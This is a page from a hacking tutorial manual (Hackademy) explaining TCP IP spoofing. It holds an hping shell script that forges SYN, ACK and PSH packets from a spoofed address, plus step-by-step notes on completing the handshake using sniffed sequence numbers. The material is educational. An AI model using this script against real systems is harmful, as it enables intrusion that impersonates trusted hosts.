You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
#!/bin/sh<br />
/usr/sbin/hping -a 192.168.0.2 -p 2222 -s 2110 -S -M 33 -c 1 192.168.0.66<br />
read u<br />
/usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -M 34 -c 1 192.168.0.66<br />
/usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -P -M 34 -c 1 -d 6 -E data 192.168.0.66<br />
To make things clearer, we are going to describe the options used for this script:<br />
-a : Address <strong>of</strong> the spo<strong>of</strong>ed machine.<br />
-p : Destination port <strong>of</strong> the packet.<br />
-s : Port used by the emitting machine.<br />
-S : SYN flag is initialized.<br />
-M : The sequence number sent by the emitting machine is determined.<br />
-c : Number <strong>of</strong> packets sent.<br />
-A : ACK flag initialized.<br />
-L : ACK number determined.<br />
-P : PSH flag initialized.<br />
-d : Can stipulate the size <strong>of</strong> data sent.<br />
-E : Can “take” data from a file.<br />
1. As seen previously, machine A is going to send a SYN packet to machine B, using <strong>of</strong> course the<br />
address <strong>of</strong> (spo<strong>of</strong>ed) machine C to prevent our packet being “dropped” by machine B (and so not<br />
processed).<br />
2. With the help <strong>of</strong> Ethereal we are going to recover the SYN/ACK packet that machine B is going to<br />
send on to machine C.<br />
3. As ACK, we send back the sequence number sent by machine B incremented by 1.<br />
Machine B: SEQ=1442628982 ------> Machine A Answer: ACK=1442628983<br />
Let us have a look at Ethereal ... (figure 4)<br />
We can note that we have the same combination SYN,SYN/ACK,ACK, typical <strong>of</strong> an authorized<br />
connection.<br />
Bingo! The connection is now initialized.<br />
The <strong>Hack</strong>ademy DMP -74/209- SYSDREAM